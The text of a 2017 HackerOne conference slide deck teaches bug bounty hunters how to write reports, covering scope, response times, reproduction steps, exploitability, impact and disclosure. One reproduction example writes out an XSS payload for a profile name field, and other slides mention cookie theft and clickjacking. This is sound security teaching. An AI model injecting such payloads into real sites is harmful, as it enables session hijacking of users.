Bug Bounty Reports - How Do They Work?Adam Bacchus, Chief Bounty Officer - HackerOneNullcon - March 2017

2

AGENDA 1. Intro

2. Know your audience

3. The Report

4. Security Team 101

5. The Good, The Bad, The Ugly

6. Resources

7. Next Steps

8. Q & A

Intro

3

Let’s get it started

Work● Pentester (~4 yrs)● Google (~4 years)● Snapchat (~1 year)● HackerOne (~1 year)

Play● Gaming● Playing with fire

Adam Bacchus

4

● Bug bounty platform where you can find organizations to hack on

● Uber, Twitter, Snapchat, Starbucks… tons more

● 100,000+ hackers to learn from, like our buddy geekboy :)

● $14 mill USD (₹ 934m) in bounties paid to hackers!

HackerOne

5

Why does this matter?

6

Why does this matter?

...better bug reports...

7

Why does this matter?

...better bug reports...

...better relationships...

8

Why does this matter?

...better bug reports...

...better relationships...

...better bounties!

9

Some Quick Terminology

10

Vulnerability

11

weakness of software, hardware, or online service that can be exploited

Report

12

an awesome write-up of the bug you’ve found

Vulnerability Disclosure

13

the process by which an organization receives and disseminates information about vulnerabilities in their products or online services

Bug Bounty Program

14

vulnerability disclosure, but with monetary incentives

Security Team

15

the people reading and responding to your bug reports, handling vulnerability management, paying out bounties, etc.

Know Your Audience

16

17

“I don't believe in elitism. I don't think the audience is this dumb person lower than

me.I am the audience.”

Quentin Tarantino

Scope

18

What is it?

Scope

19

●In scope: List of websites, apps, IoT, etc. that are okay to hack

Scope

20

●Out of scope: Stay away!

Scope

21

●Why are things out of scope?○Infrastructure can’t handle scans○Security team already knows it needs work

○Security team is starting small and working their way up

○Hosted by a third party; security team doesn’t control it

Scope

22

What if I find a new scope?

Scope

23

Don’t be afraid to ask!

But keep expectations low - they might not be ready for the new

scope yet.

SLA - Service Level Agreement

24

“an official commitment that prevails between a service provider and the

customer. Particular aspects of the service – quality, availability, responsibilities – are agreed between the service provider and

the service user.”

A Service For Hackers

25

That’s right - a vulnerability disclosure/bug bounty program is a service, to you, the hacker.

What should a security team provide?

26

How much time for...

What should a security team provide?

27

How much time for…

...first response

What should a security team provide?

28

How much time for…

...first response

...bounty decision

What should a security team provide?

29

How much time for…

...first response

...bounty decision

...remediation

What if the security team doesn’t have SLAs?

30

(didn’t we see this slide already?)

31

Don’t be afraid to ask!

“What’s your normal turnaround time on X?”

What are typical SLAs?

32

First Response = 3 business days

What are typical SLAs?

33

First Response = 3 business daysBounty Decision = 1 - 3 weeks after

triage

What are typical SLAs?

34

First Response = 3 business daysBounty Decision = 1 - 3 weeks after triage

Remediation depends on severityCritical = 1-2 daysHigh = 1-2 weeks

Medium = 4-8 weeksLow = 3 months

What NOT to do

35

1.Send report2.Five minutes later... update plz!

3.Ten minutes later… bounty plz!

The Report

36

Reproduction Steps

37

Specific, detailed, step by step instructions on how to reproduce the vulnerability.

Reproduction Steps - The Wrong Way

38

1. You got an XSS on the name… BOOM!!!2. Where’s my bounty?

Reproduction Steps - The Right Way

39

1.While logged in, navigate to your profile at <url>

2.Click the “Edit” button in the upper right

3.Change your first name to “><img src=x onerror=prompt(document.cookie)>

4.Click “Save”5.Navigate to your profile at <url>, the XSS should fire

Exploitability

40

How would a real attack work? Think like an attacker!

Exploitability

41

If an attack isn’t exploitable, how much does a security team care about it?

Exploitability - The Wrong Way - Clickjacking

42

1.Navigate to <URL>2.X-Frame-Options header is missing

3.???4.Profit?

Exploitability - The Right Way - Clickjacking

43

1.Navigate to <URL>2.X-Frame-Options header is missing

3.You can use clickjacking to trick a user into deleting their account. See attached HTML file for a PoC.

Exploitability - The Wrong Way - Server Info

44

1.Your server at <IP>

is showing banner information and is out of date.

2.???3.Profit?

Exploitability - The Right Way - Server Info

45

1.Your server at <IP> is running an outdated version of <software>.

2.I’ve verified it’s vulnerable to a known XSS which can be used to steal <cookie ID> and hijack users’ sessions. Here are the repro steps.

Impact

46

We know how to repro…We know exploitability / attack vector…

So now what?

Impact

47

What happens if this vulnerability gets exploited?

What does the security team care about most?

48

Put yourself in the organization’s shoesIndustry Compliance What they care about

Healthcare Health Insurance Portability and Accountability Act (HIPAA)

PII (Personally Identifiable Information), e.g. patient data

eCommerce / Retail Payment Card Industry Data Security Standard (PCI-DSS)

User data, especially credit card info

Government (U.S.)The Federal Information

Security Management Act (FISMA)

Employee info, classified info

Finance Gramm-Leach-Bliley Act (GLBA), PCI-DSS

Consumer and investor financial data

Education Family Educational Rights and Privacy Act (FERPA) Student records

Technology It depends! It depends!

49

Put yourself in the organization’s shoes

User information disclosure of first and last name. Where is the impact bigger?

or...

50

Put yourself in the organization’s shoes

User information disclosure of first and last name. Where is the impact bigger?

or...

Impact - The Wrong Way

51

1.You have an XSS 2.<repro steps>3.<exploitability info>4.…5.Profit?

Impact - The Right Way

52

1. Here’s a PoC to steal session info via XSS

2. Exploiting this against a regular user would allow access to view and modify their name, address, birthdate, as well as transfer all money out of their account.

Impact

53

What is CIA?

Confidentiality - Integrity - Availability

Confidentiality

54

“...information is not made available or disclosed to unauthorized individuals,

entities, or processes.”

Integrity

55

“Ensuring data cannot be modified in an unauthorized or undetected manner.”

Availability

56

“Information must be available when it is needed.”

Impact - CIA

57

Think about how your vulnerability impacts the Confidentiality, Integrity,

and Availability of the organization’s assets.

“The Bar”

58

What is it?

“The Bar”

59🤔

“The Bar”

60

The minimum severity vulnerability that qualifies for a program.

“The Bar”

61

Every organization cares about different things.

It’s all about context.

“The Bar”

62

Ask yourself:

“If I were the security team, is this important enough that I’d want to bother a

developer to fix it?”

“The Bar”

63

So you’ve found clickjacking on a page with only static content?

“The Bar” - Open Redirects

64

Is Open Redirect technically a vulnerability?

Yes.Does company XYZ care?

Probably not.Why not?

“The Bar” - Logout XSRF

65

Is Logout XSRF technically a vulnerability?Yes.

Does company XYZ care?Probably not.

Why not?

“The Bar”

66

Vulns can be 100% accurate, but so what?

(this slide AGAIN!?)

67

Don’t be afraid to ask!

“Do you care about vulnerabilities like X?”

Public Disclosure

68

What is it?

After the bug is fixed, the security team and hacker agree to disclose the report as an example for the bug bounty community.

The Good, The Bad, The Ugly

69

Bug Bounty Reports IRL

Reports IRL - The Good, The Bad, The Ugly

70

Let’s take a look at some real life examples...

The Good - hackerone.com/reports/143717

71

Report: Changing any Uber user’s passwordBounty: $10,000 USD

Let’s check it out!

The Bad - hackerone.com/reports/156098

72

Report: XSS At "pages.et.uber.com"Bounty: um...

The Bad - hackerone.com/reports/156098

73

The Bad - hackerone.com/reports/156098

74

The Bad - hackerone.com/reports/156098

75

The Ugly - hackerone.com/reports/137723

76

Report: “vulnerabilitie”Bounty: we get to laugh at the report?

Let’s check it out!

Resources

77

Resources

78

●Web Application Hacker’s Handbook●Web Hacking 101●Google Bughunter University●Google Gruyere●Burp Suite●Bug Bounty Reports - How Do They Wor

k?

Hacktivity! https://hackerone.com/hacktivity

79

Recap

80

Quick Recap

81

Know your audience!Think from the security team’s perspective

“I am the audience”

Repro + Exploitability + ImpactAsk questions, get clarity

Any questions?

82

Thank You

83

Adam Bacchus adam@hackerone.com @sushihack linkedin.com/in/adambacchus/ facebook.com/sushihack

84